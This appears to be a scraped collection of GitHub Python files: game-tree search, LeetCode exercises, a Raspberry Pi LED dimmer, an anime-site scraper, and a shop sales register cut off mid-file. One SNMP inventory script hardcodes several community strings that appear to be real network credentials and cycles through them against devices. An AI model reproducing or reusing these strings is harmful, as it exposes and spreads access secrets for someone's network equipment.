forme [nbrVictoires,nbrNulles,nbrDefaites]\n tampon.nb_visites+=1\n tampon=tampon.parent\n if(resultat==0): #nulle\n tampon.listeScore[1]+=1\n elif(resultat==1): #vicroite\n tampon.listeScore[0]+=1\n elif(resultat==-1): #perdudos\n tampon.listeScore[2]+=1 #exemple : score est de la forme [nbrVictoires,nbrNulles,nbrDefaites]\n tampon.nb_visites+=1\n \n\n\n def calculerValeurNoeud(self): \n if(self.joue==True):\n nbVictoire=self.listeScore[0]\n if(self.joue==False): \n nbVictoire=self.listeScore[2] #on souhaite qu'un noeud soit perdant pour l'adversaire \n valeurMoyenne=nbVictoire/self.nb_visites\n\n #print(valeurMoyenne, \"c'est la valeur moyenne\")\n #print(self.parent.nb_visites/self.nb_visites, \"c'est cette merde\")\n #print(log(self.parent.nb_visites)/self.nb_visites, \"pour voir\")\n\n ret = valeurMoyenne + C*sqrt(log(self.parent.nb_visites)/self.nb_visites)\n #print (ret, \" Valeur qui est en dessous de 0 apparement\")\n return ret\n\n \n def meilleurEnfant(self):\n meilleurScore = 'nul'\n listeEnfants = []\n for c in range(len(self.enfants)) :\n listeScore=self.enfants[c].listeScore\n if (listeScore == [0, 0, 0]) :\n score = 0\n else :\n score = (listeScore[0] + 0.2 * listeScore[1]) / (listeScore[0] + listeScore[1] + listeScore[2])\n #afficher_grille(self.enfants[c].etat)\n #print (\"Enfant no : \", c, \" avec un score de \", score)\n if (meilleurScore == 'nul') :\n meilleurScore=score\n listeEnfants.append(self.enfants[c])\n if (score == meilleurScore):\n listeEnfants.append(self.enfants[c])\n if (score > meilleurScore):\n listeEnfants = [self.enfants[c]]\n meilleurScore = score \n return random.choice(listeEnfants)\n\n def retrouveEnfant(self, mouvement) : \n for e in range (len(self.enfants)) :\n if self.enfants[e].mouvement[0] == mouvement : \n return e\n return 0\n\n\n\n","repo_name":"Damidas0/-2022-Cours-MCTS-Minmax-applique-au-puissance-4","sub_path":"MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43372311238","text":"# You are given the head of a linked list, and an integer k.\n# Return the head of the linked list after swapping the values of the kth node from the beginning\n# and the kth node from the end (the list is 1-indexed).\n# ----------------------\n# The number of nodes in the list is n.\n# 1 <= k <= n <= 10 ** 5 , 0 <= Node.val <= 100\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val: int = val\n self.next: ListNode = next\n\n def __str__(self):\n return f\"{self.val} -> {self.next}\"\n\n\ndef create_linked(to_link: list[int]) -> ListNode:\n tempo = link = ListNode()\n for index in range(len(to_link)):\n tempo.val = to_link[index]\n if index != (len(to_link) - 1):\n tempo.next = ListNode()\n tempo = tempo.next\n return link\n\n\ndef t_one_linked(to_test: ListNode, testout: list[int]) -> None:\n tempo: ListNode = to_test\n count: int = 0\n for _ in range(len(testout)):\n assert testout[_] == tempo.val\n tempo = tempo.next\n count += 1\n assert count == len(testout)\n\n\ndef swap_nodes(head: ListNode, k: int) -> ListNode:\n # working_sol (75.95%, 34.80%) -> (952ms, 50.9mb) time: O(n) | space: O(n)\n if not head:\n return head\n all_nodes: list[ListNode] = [0] # for 1 indexed\n tempo: ListNode = head\n while tempo:\n all_nodes.append(tempo)\n tempo = tempo.next\n all_nodes[k].val, all_nodes[-k].val = all_nodes[-k].val, all_nodes[k].val\n return head\n\n\n# Time complexity: O(n) -> traversing input_list once, and creating list with links to every node => O(n)\n# n - number of nodes in input_list^^|\n# Auxiliary space: O(n) -> extra list with all links to a nodes of input_list => O(n)\n# ----------------------\n# No info about correct input, guess this is why it's medium.\n# Because what if k == 3, and list is having 1 node?\n# !\n# The number of nodes in the list is n. 1 <= k <= n <= 10 ** 5 !\n# Ok. It's fine.\n# ----------------------\n# No limitations, jus save whole list and swap k nodes in a list, append is O(1) get index is O(1),\n# should be enough.\n\n\ntest1 = [1, 2, 3, 4, 5]\ntest1_k = 2\ntest1_out = [1, 4, 3, 2, 5]\ntest1_linked = create_linked(test1)\ntest = swap_nodes(test1_linked, test1_k)\nt_one_linked(test, test1_out)\ndel test\n\ntest2 = [7, 9, 6, 6, 7, 8, 3, 0, 9, 5]\ntest2_k = 5\ntest2_out = [7, 9, 6, 6, 8, 7, 3, 0, 9, 5]\ntest2_linked = create_linked(test2)\ntest = swap_nodes(test2_linked, test2_k)\nt_one_linked(test, test2_out)\ndel test\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p1721_swapping_nodes_in_a_linked_list.py","file_name":"p1721_swapping_nodes_in_a_linked_list.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21558455587","text":"\"\"\"===============================================================================\n\n FILE: _common.py\n\n USAGE: (not intended to be directly executed)\n\n DESCRIPTION: \n\n OPTIONS: ---\nREQUIREMENTS: ---\n BUGS: ---\n NOTES: ---\n AUTHOR: Alex Leontiev (alozz1991@gmail.com)\nORGANIZATION: \n VERSION: ---\n CREATED: 2021-05-09T14:28:51.296432\n REVISION: ---\n\n===============================================================================\"\"\"\nimport os\nfrom os import path\n\n\nclass Input:\n def __init__(self,):\n self._id = 0\n self._dropdowns = {}\n for fn in os.listdir(\"data/dropdowns\"):\n if fn.endswith(\".txt\"):\n with open(path.join(\"data/dropdowns\", fn)) as f:\n content = f.read().strip()\n self._dropdowns[fn[:-4]] = [line.strip()\n for line in content.split(\"\\n\") if len(line.strip()) > 0]\n\n def input(self):\n id_ = self._id\n self._id += 1\n return f\"\"\"\"\"\"\n\n def dropdown_names(self):\n res = list(self._dropdowns)\n# print(f\"dropdown_names: {res}\")\n return res\n\n def dropdown(self, dropdown_name):\n choices = self._dropdowns[str(dropdown_name)]\n choices = [\"\",*choices]\n# print(f\"{dropdown_name} => {choices}\")\n\n id_ = self._id\n self._id += 1\n\n res = f\"\"\n return res\n","repo_name":"nailbiter/candice-accounting-threadmill","sub_path":"_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39545250882","text":"from RPi import GPIO\nfrom time import sleep\n\nswitch = 10 #Switch pin\nclk = 11 #CLK pin\ndt = 12 #PWM0\nledpin = 33 #PWM 1\n\nswitch_state = False\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\n\nGPIO.setup(switch, GPIO.IN, pull_up_down=GPIO.PUD_UP) #Pullup på switch\nGPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Pulldown på CLK\nGPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Pulldown på dt\nGPIO.setup(ledpin, GPIO.OUT)\n\nRPI_PWM = GPIO.PWM(ledpin, 100)\nRPI_PWM.start(0) #Starter på 0% Dutycycle\n\ncounter = 50\nclkLastState = GPIO.input(clk)\n\ndef button_pressed_callback(channel):\n global switch_state\n global counter\n switch_state = not switch_state\n if switch_state == False:\n RPI_PWM.stop()\n print(\"Stopper\")\n if switch_state == True:\n RPI_PWM.start(counter)\n print(\"starter\")\n sleep(200)\n\nGPIO.add_event_detect(switch, GPIO.RISING, callback=button_pressed_callback, bouncetime=200)\n\ndef Limit(number, min_number, max_number):\n if number < min_number:\n return min_number\n elif number > max_number:\n return max_number\n else:\n return number\n \ntry:\n while True: \n if switch_state == True: #Hvis state True, Juster lysene etter encoderen\n clkState = GPIO.input(clk)\n dtState = GPIO.input(dt)\n if clkState != clkLastState:\n if dtState != clkState:\n counter += 5 #Tell en opp\n else:\n counter -= 5 #Tell en ned\n counter = Limit(counter, 1, 100) #Limit counteren mellom 1 og 1000 (Max og min frekvens)\n RPI_PWM.ChangeDutyCycle(counter) #Sett Frekvensen til led lik counteren\n print(counter)\n clkLastState = clkState\n sleep(0.01)\nfinally:\n GPIO.cleanup()","repo_name":"SyverH/RotaryEncoderLedPWM","sub_path":"RotaryEncoderPWM.py","file_name":"RotaryEncoderPWM.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36520230143","text":"#!/bin/python\nimport sys\nimport time\nimport tempfile\nimport requests as rq\nfrom bs4 import BeautifulSoup as bs\nfrom pathlib import Path\nimport os\nimport multiprocessing\nfrom pySmartDL import SmartDL\nimport subprocess\n\ndef search(name,cat):\n page = rq.get(\"https://myanimelist.net/anime.php?q={}&cat={}\".format(name,cat))\n soup = bs(page.content,features=\"lxml\")\n for title in soup.findAll('strong')[0:10]:\n link = title.findPrevious('a')['href']\n typ = title.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n epi = typ.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n score = epi.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n print (title.text.strip(), end='\\t')\n print (\"Episodes:\",epi.text.strip(), end='\\t')\n print (\"Score:\",score.text.strip(), end='\\t')\n print (\"Type:\",typ.text.strip())\n print (\"Link:\",link.strip())\n print ()\n page = rq.get(\"https://myanimelist.net/manga.php?q={}&cat={}\".format(name,cat))\n soup = bs(page.content,features=\"lxml\")\n for title in soup.findAll('strong')[0:10]:\n link = title.findPrevious('a')['href']\n typ = title.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n epi = typ.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n score = epi.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n print (title.text.strip(), end='\\t')\n print (\"Episodes:\",epi.text.strip(), end='\\t')\n print (\"Score:\",score.text.strip(), end='\\t')\n print (\"Type:\",typ.text.strip())\n print (\"Link:\",link.strip())\n print ()\n\n\nn = len(sys.argv)\ncat = \"\"\nif n == 1:\n print (\"USAGE: python [category]\\nCategory = anime(an)/manga(ma)/all(al)\")\n quit()\nelif n == 2:\n name = sys.argv[1]\nelif n == 3:\n name = sys.argv[1]\n cat = sys.argv[2]\n if cat == \"anime\" or cat == \"an\":\n cat = \"anime\"\n elif cat == \"manga\" or cat == \"ma\":\n cat = \"manga\"\n elif cat == \"all\" or cat == \"al\":\n cat = \"all\"\n else:\n print (\"Invalid category\")\n quit()\nelse:\n quit()\n\nsearch(name,cat)\n","repo_name":"abhirup-m/shell-scripts","sub_path":"anime_search.py","file_name":"anime_search.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14525133214","text":"#\n# @lc app=leetcode id=295 lang=python3\n#\n# [295] Find Median from Data Stream\n#\n\n# @lc code=start\nclass MedianFinder:\n\n def __init__(self):\n self.H = []\n\n def addNum(self, num: int) -> None:\n for i in range(len(self.H)):\n if self.H[i] <= num:\n continue\n self.H.insert(i,num)\n return\n self.H.append(num)\n def findMedian(self) -> float:\n \n if len(self.H) % 2 == 0:\n return (self.H[(len(self.H)//2)-1] + self.H[len(self.H)//2])/2\n else:\n return self.H[(len(self.H)//2)]\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\n# @lc code=end\n\n","repo_name":"AbhiPatel2105/problem_solving","sub_path":"leetcode/295.find-median-from-data-stream.py","file_name":"295.find-median-from-data-stream.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5071206179","text":"# -*- encoding: utf-8 -*-\nimport matplotlib.pyplot as plt\n\n\ndef f(x):\n return 1 / (1 + x ** 2)\n\n\ndef lagrange(x, begin: int, end: int, n: int):\n xn = [i / n for i in range(begin * n, end * n + 1, n)]\n yn = [f(i) for i in xn]\n sum = 0\n for k in range(len(yn)):\n multi = 1\n for i in range(len(xn)):\n if i != k:\n multi *= (x - xn[i]) / (xn[k] - xn[i])\n sum += yn[k] * multi\n return sum\n\n\ndef main():\n begin = -5\n end = 5\n n = 10\n xn = [i / n for i in range(begin * n, end * n + 1)]\n yn = [f(i) for i in xn]\n ln = [lagrange(i, begin, end, n) for i in xn]\n ymax=max(1,max(ln),-min(ln))\n plt.plot(xn, yn, color='r', label='f(x)')\n plt.plot(xn, ln, color='b', label='Ln(x)')\n plt.legend()\n plt.axis([begin,end,-ymax*2,ymax*2])\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"befallenStar/engineering-mathematics","sub_path":"polynomial_interpolation.py","file_name":"polynomial_interpolation.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29085064828","text":"import sys\nimport heapq\n\nn, e = map(int, sys.stdin.readline().split())\n\ngraph = [[] for _ in range(n)]\nfor _ in range(e):\n a,b,c = map(int, sys.stdin.readline().split())\n graph[a-1].append((b-1,c))\n graph[b-1].append((a-1,c))\n\nv1, v2 = map(int, sys.stdin.readline().split())\n\ndef djs(st):\n distance = [int(1e9)] * n\n que = []\n\n heapq.heappush(que,(0, st))\n distance[st] = 0\n \n while que:\n dist, now = heapq.heappop(que)\n\n if distance[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(que,(cost, i[0]))\n \n return distance\n\nfromS = djs(0)\nfromV1 = djs(v1-1)\nfromV2 = djs(v2 - 1)\n\ncase1 = fromS[v1-1] + fromV1[v2-1] + fromV2[n-1]\ncase2 = fromS[v2-1] + fromV2[v1-1] + fromV1[n-1]\n\nif case1 >= int(1e9) and case2 >= int(1e9):\n print(-1)\nelse:\n print(min(case1, case2))","repo_name":"spaceOfSoul/baekjunSolve_python","sub_path":"1504.py","file_name":"1504.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15952880305","text":"def run(): \r\n # A los diccionarios se accede por llaves, en vez de indices o index \r\n my_dictionary = {\r\n 'llave1': 1,\r\n 'llave2': 2,\r\n 'llave3': 3,\r\n }\r\n # Al acceder a un elemento del diccionario se hace por llavesd y entre corchetes\r\n #print(my_dictionary['llave1'])\r\n poblacion_paises ={\r\n 'Argentina': 44938712,\r\n 'Brazil': 210147125,\r\n 'Colombia': 4648111,\r\n }\r\n\r\n # Mostrar las llaves del diccionario, FUNCIONA SIN EL .keys\r\n #for paises in poblacion_paises.keys():\r\n # print(paises)\r\n #Mostrar los valores asignados a dichas llaves, ES NECESARIO el .values\r\n #for habitantes in poblacion_paises.values():\r\n #print(habitantes)\r\n \r\n for paises, poblacion in poblacion_paises.items():\r\n print(paises + ' '+ str(poblacion))\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n run()","repo_name":"snnare/python_proyects","sub_path":"diccionarios.py","file_name":"diccionarios.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70505269369","text":"import random\nimport math\n\nfrom abs_estimator import AbsEstimator\n\n\nclass RandomWalk(AbsEstimator):\n _MIN_NUMBER_MATCHES_FOR_SEED_QUERY_INFORMATION = \"Número mínimo de resultados para busca semente\"\n _MIN_NUMBER_MATCHES_FOR_SEED_QUERY = 2\n _MIN_NUMBER_WORDS_INFORMATION = \"Número mínimo de palavras em um dcumento sorteado\"\n _MIN_NUMBER_WORDS = 2\n _RANDOM_WALK_SAMPLE_SIZE_INFORMATION = \"Número de nós visitados durante um \\\"random walk\\\"\"\n _RANDOM_WALK_SAMPLE_SIZE = 5000\n\n @property\n def experiment_details(self):\n additional_information = {RandomWalk._MIN_NUMBER_WORDS_INFORMATION:\n RandomWalk._MIN_NUMBER_WORDS,\n RandomWalk._MIN_NUMBER_MATCHES_FOR_SEED_QUERY_INFORMATION:\n RandomWalk._MIN_NUMBER_MATCHES_FOR_SEED_QUERY,\n RandomWalk._RANDOM_WALK_SAMPLE_SIZE_INFORMATION:\n RandomWalk._RANDOM_WALK_SAMPLE_SIZE}\n return additional_information\n\n @property\n def common_api(self):\n return self.__common_api\n\n @common_api.setter\n def common_api(self, val):\n self.__common_api = val\n\n def __init__(self, common_api):\n self.__common_api = common_api\n\n def estimate(self):\n super().estimate()\n document_degree_list = []\n frequency_number_nodes_dict = self._random_walk(document_degree_list)\n n = len(document_degree_list)\n dw = sum(document_degree_list) / n\n dh = n / sum([1 / x for x in document_degree_list])\n binomy_n_2 = math.factorial(n) / (math.factorial(n - 2) * 2)\n c = sum([((math.factorial(x) / (math.factorial(x - 2) * 2)) * frequency_number_nodes_dict[x]) for x in\n frequency_number_nodes_dict.keys()])\n estimation = (dw / dh) * binomy_n_2 * (1 / c)\n return estimation\n\n def _random_walk(self, document_degree_list):\n query_pool = self.common_api.read_query_pool()\n size = len(query_pool)\n query = query_pool[random.randrange(0, size)]\n number_matches = self.common_api.retrieve_number_matches(query)\n while number_matches < RandomWalk._MIN_NUMBER_MATCHES_FOR_SEED_QUERY:\n query = query_pool[random.randrange(0, size)]\n number_matches = self.common_api.retrieve_number_matches(query)\n words = []\n count = 0\n number_words = 0\n node_frequency_dict = {}\n while count < RandomWalk._RANDOM_WALK_SAMPLE_SIZE:\n if number_matches > 0:\n random_index = random.randrange(0, number_matches)\n try:\n results = self.common_api.download(query, True, True, random_index, 1).results\n except:\n query = words[random.randrange(0, number_words)]\n number_matches = self.common_api.retrieve_number_matches(query)\n continue\n document = results[0]\n words_buffer = self.common_api.extract_words(document.content)\n number_words_buffer = len(words_buffer)\n if number_words_buffer < RandomWalk._MIN_NUMBER_WORDS:\n query = words[random.randrange(0, number_words)]\n number_matches = self.common_api.retrieve_number_matches(query)\n continue\n words = words_buffer\n number_words = number_words_buffer\n document_degree_list.append(number_words)\n node_frequency_dict[document.identifier] = \\\n node_frequency_dict.get(document.identifier, 0) + 1\n count += 1\n self.common_api.report_progress(count, RandomWalk._RANDOM_WALK_SAMPLE_SIZE)\n query = words[random.randrange(0, number_words)]\n number_matches = self.common_api.retrieve_number_matches(query)\n frequency_node_dict = {}\n for key in node_frequency_dict.keys():\n frequency_node_dict[node_frequency_dict[key]] = frequency_node_dict.get(node_frequency_dict[key], [])\n frequency_node_dict[node_frequency_dict[key]].append(key)\n frequency_number_nodes_dict = {x: len(frequency_node_dict[x]) for x in frequency_node_dict.keys() if x > 1}\n return frequency_number_nodes_dict\n","repo_name":"fpbfabio/estimation_methods","sub_path":"random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30374494808","text":"def isPrime(num: int) -> bool:\n\tif(num == 1):\n\t\treturn False\n\tfor i in range(2,int(num**0.5) + 1):\n\t\tif not(num%i):\n\t\t\t#print(num,\"is devied by\",i)\n\t\t\treturn False\n\t#print(num,\"is prime\")\n\treturn True\n\ndef isPrimeday(day: int) -> bool:\n\ti = 10\n\twhile day//i:\n\t\tif(isPrime(day%i)):\n\t\t\ti = i * 10\n\t\telse:\n\t\t\t#print(day,'is not prime')\n\t\t\treturn False\n\tif(not isPrime(day)):\n\t\treturn False\n\n\treturn True\n\n\ndef isDate(day: int) -> bool:\n\tif day%100 > 31 or day%100 < 0:\n\t\treturn False\n\tif (day%10000)//100 > 12 or (day%10000)//100 < 1:\n\t\treturn False\n\tif (day%10000 == 230 or day%10000 == 231 or day%10000 == 431 or day%10000 == 631 or day%10000 == 931 or day%10000 == 1131):\n\t\treturn False\n\treturn True\n\nif(__name__ == '__main__'):\n\tfor i in range(10000,21191232):\n\t#for i in range(20190523, 20200000):\n\t\tif isDate(i):\n\t\t\tif isPrimeday(i):\n\t\t\t\tprint(i,\"++++++++++++++is primeday!++++++++++++++\")\n\t\t\t\t#isPrimedayProof(i)\nelse:\n\tprint(\"not imported\")","repo_name":"principia12/Lecture-Preparation-","sub_path":"Examples/little_coding/Primeday/primeday.py","file_name":"primeday.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9657925229","text":"def can_sum(target_sum, numbers):\n if target_sum == 0:\n return True\n if target_sum < 0:\n return False\n for number in numbers:\n remainder = target_sum - number\n print(\"rem: \", remainder)\n if (can_sum(remainder, numbers) == True):\n return True\n return False\n\ndef can_sum_dp(target_sum, numbers, cs_hash = {}):\n if target_sum == 0:\n return True\n if target_sum < 0:\n return False\n if target_sum in cs_hash:\n return cs_hash[target_sum]\n for number in numbers:\n remainder = target_sum - number\n print(cs_hash)\n if (can_sum_dp(remainder, numbers, cs_hash) == True):\n cs_hash[remainder] = True\n return True\n else:\n cs_hash[remainder] = False\n\n return False\nprint(can_sum_dp(714, [7, 14]))\n","repo_name":"psymbio/cp","sub_path":"algoexpert/dp/03_can_sum.py","file_name":"03_can_sum.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69926062968","text":"mylist = []\r\nprint(\"Enter 5 elements for the list: \")\r\nfor i in range(5):\r\n value = int(input())\r\n mylist.append(value)\r\n# printing original list\r\nprint(\"The original list : \" + str(mylist))\r\n# Separating odd and even index elements\r\nodd_i = []\r\neven_i = []\r\nfor i in range(0, len(mylist)):\r\n if i % 2:\r\n even_i.append(mylist[i])\r\n else :\r\n odd_i.append(mylist[i])\r\nresult = odd_i + even_i\r\n# print result\r\nprint(\"Separated odd and even index list: \" + str(result))","repo_name":"avboi/pycodes","sub_path":"12. Input a list of numbers and swap elements at the even location with the elements at the.py","file_name":"12. Input a list of numbers and swap elements at the even location with the elements at the.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19041807262","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.datetime_safe\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('post', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='post',\n name='created_at',\n field=models.DateTimeField(default=django.utils.datetime_safe.datetime.now, editable=False),\n preserve_default=False,\n ),\n ]\n","repo_name":"bkawan/manutd.org.np","sub_path":"apps/post/migrations/0002_post_created_at.py","file_name":"0002_post_created_at.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2782573009","text":"#!/usr/bin/env python3\n#import pdb;pdb.set_trace()\nfrom easysnmp import snmp_get\nfrom easysnmp.variables import SNMPVariable\n\nsnmp_ro=['noC2mae8Dee3','kp2x45dv8v','ghbitktw','xaxbkfi8yp0vuos']\nsnmp_oid_hostname='.1.3.6.1.2.1.1.5.0'\nsnmp_version=[2,1]\n\ndef fun_snmp(ip,oid=snmp_oid_hostname,snmp_v=snmp_version,snmp_r=snmp_ro):\n value=SNMPVariable('')\n for ver in snmp_v:\n for com in snmp_r:\n #print(ip,ver,com,oid)\n try:\n value=snmp_get(oid, hostname=ip, community=com, version=ver,retries=0,timeout=1)\n except:\n value=SNMPVariable('')\n else:\n return (value.value,com,ver)\n return (value.value,'snmp_ro','snmp_vers') \n#s=fun_snmp('10.218.59.86')\n#print(s)\n","repo_name":"Dmitriy-Zaytsev/code","sub_path":"code/python/inventory_network/mysnmp.py","file_name":"mysnmp.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25618268152","text":"import csv\nfrom Town import Town\n\n\ndef import_file(filename):\n '''\n Gets coordinate data and puts them as Town nodes from CSV file\n :return: List of Town objects\n '''\n with open(filename, \"r\") as myfile:\n reader = csv.reader(myfile)\n next(reader)\n towns = []\n for line in reader:\n num_array = []\n for num in line:\n num_array.append(int(float(num)))\n towns.append(Town(num_array[0], num_array[1], num_array[2]))\n return towns\n\ndef get_data():\n '''\n Gets coordinate data from CSV file\n :return: List of lists of coords\n '''\n with open('cities_subset40.csv', 'r') as f:\n reader = csv.reader(f)\n next(reader)\n city_coords = []\n for row in reader:\n city_coords.append([int(float(row[1])), int(float(row[2]))])\n data = city_coords\n return data\n\n# def get_coordinates(data):\n# result = []\n# for i in data:\n# result.append(i)\n# print(\"coordinates acquired\")\n# return result\n\n\ndef get_distance(coord_1, coord_2):\n # Returns distance between two coordinates using Pythagoras' Equation\n return round(((coord_1[0] - coord_2[0]) ** 2 + (coord_1[1] - coord_2[1]) ** 2) ** 0.5)\n\n\ndef get_edges(coordinates):\n # Gets all combinations of coordinates, get indices of them, and gets distance between the two.\n\n combos = []\n for i in coordinates:\n for j in coordinates:\n if i != j:\n combos.append([coordinates.index(i), coordinates.index(j), get_distance(i, j)])\n return combos\n","repo_name":"Expensure/IPASS_ShortestPath","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43317330213","text":"import sys\n\n\nmersenne = [3, 7, 31, 127, 2047]\n\n\ndef main():\n test_cases = open(sys.argv[1], 'r')\n for test in test_cases:\n test = test.strip()\n if len(test) == 0:\n continue\n test = int(test)\n result = []\n for m in mersenne:\n if test > m:\n result.append(m)\n print(', '.join([str(r) for r in result]))\n test_cases.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"daleysoftware/codeeval","sub_path":"0-easy/mersenne-prime/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"77"} +{"seq_id":"18575318218","text":"import math\nprint('''\nMenu de Opções:\n 1. Somar dois números\n 2. Raiz quadrada de um número\n \n''')\nbotaoMenu = int(input(\"\\nDigite a opção desejada: \"))\n\nif botaoMenu == 1:\n numero01 = int(input(\"Digite o primeiro numero: \"))\n numero02 = int(input(\"Digite o segundo numero: \"))\n print(\"O resultado da sua soma é: \", numero01 + numero02)\n\nelif botaoMenu == 2:\n numero03 = int(input(\"Digite um numero: \"))\n raizQuadrada = math.sqrt(numero03)\n print(\"A raiz quadrada de {}\".format(numero03),\"é: \", raizQuadrada)","repo_name":"dihogoteixeira/fiap-ctp-exercises","sub_path":"exercicios-aula-09/AULA_09_Exercicio18.py","file_name":"AULA_09_Exercicio18.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19829011546","text":"def cadastro_produtos(produto, Produtos): # Função para cadastro de produtos\n achou= False\n while True:\n cod_produto=int(input('Digite o código do produto (Digite 0 para SAIR): '))\n if cod_produto == 0:\n break\n for i in range(len(produto)):\n if cod_produto == produto[i].Cod_prod:\n achou= True\n break\n if achou:\n print('Codigo já cadastrado para esse produto!!!')\n break\n else:\n nome=input('Nome produto: ')\n qtd_estoque=int(input('Quantidade: '))\n preco=float(input('Preço do produto: '))\n\n produto.append(Produtos(cod_produto,nome,qtd_estoque,preco))\n print('Produto cadastrado')\n print()\n\ndef atualiza_produtos(produto): # Função para atualizar produto\n achou= False\n cod_produto=int(input('Digite o código do produto: '))\n for i in range(len(produto)):\n if cod_produto == produto[i].Cod_prod:\n achou= True\n break\n if achou:\n atualizar=input('Deseja atualizar preço ou quantidade em estoque (1-preço ou 2-quantidade): ')\n if atualizar == '1':\n produto[i].Preco=float(input('Novo preço: '))\n else:\n produto[i].Qtd_estoque=int(input('Nova quantidade em estoque: '))\n print('Produto atualizado!!!')\n else:\n print('Produto não encontrado!!!!')\n print()\n\ndef pesquisa_produto(produto): # Função para pesquisa\n prod=int(input('Digite o código do produto: '))\n achou= False\n for i in range(len(produto)):\n if prod == produto[i].Cod_prod:\n achou= True\n break\n if achou == False:\n print('Produto não encontrado!!!')\n else:\n print(f'Cod_produto: {produto[i].Cod_prod} - Nome: {produto[i].Nome} - Estoque: {produto[i].Qtd_estoque} - Preço: {produto[i].Preco}')\n print()\n\ndef exclui_produto(produto): # Função para excluir produto\n achou= False\n cod_produto=int(input('Digite o código do produto: '))\n for i in range(len(produto)):\n if cod_produto == produto[i].Cod_prod:\n achou= True\n break\n if achou:\n del(produto[i])\n print('Produto Excluido')\n else:\n print('Produto não encontrado!!!!')\n print()\n\ndef visualizar_produtos(produto): # Função para visualizar todos os produtos\n print('|---------------Tabela de Produtos-----------------|')\n for i in range(len(produto)):\n print(f'Cod_produto: {produto[i].Cod_prod} - Nome: {produto[i].Nome} - Estoque: {produto[i].Qtd_estoque} - Preço: {produto[i].Preco}')\n print()\n\ndef registro_vendas(venda,produto,Vendas): # Função para vender\n acum= 0\n num_comanda=int(input('Número da comando: '))\n achou= False\n for l in range(len(venda)):\n if num_comanda == venda[l].Num_comanda:\n achou= True\n break\n if achou:\n print('Número da comanda já existenti')\n else:\n while True:\n cod_produto=int(input('Código do produto (Digite 0 para SAIR): '))\n if cod_produto == 0:\n break\n achou= False\n for i in range(len(produto)):\n if cod_produto == produto[i].Cod_prod:\n achou= True\n break\n if achou == False:\n print('Produto não encontrado!!!')\n break\n else:\n qtd=int(input('Quantidade: '))\n venda.append(Vendas(num_comanda,cod_produto,qtd,0,0,0,0))\n print()\n print('Nº comanda ---------> {}'.format(venda[i].Num_comanda)) \n for i in range(len(venda)):\n for j in range(len(produto)):\n if venda[i].Cod_prod == produto[j].Cod_prod:\n print(f'Código do produto ------> {venda[i].Cod_prod}')\n print(f'Nome produto ---> {produto[j].Nome}')\n print(f'Qtd ------> {venda[i].Qtd}')\n print(f'Preço unitario 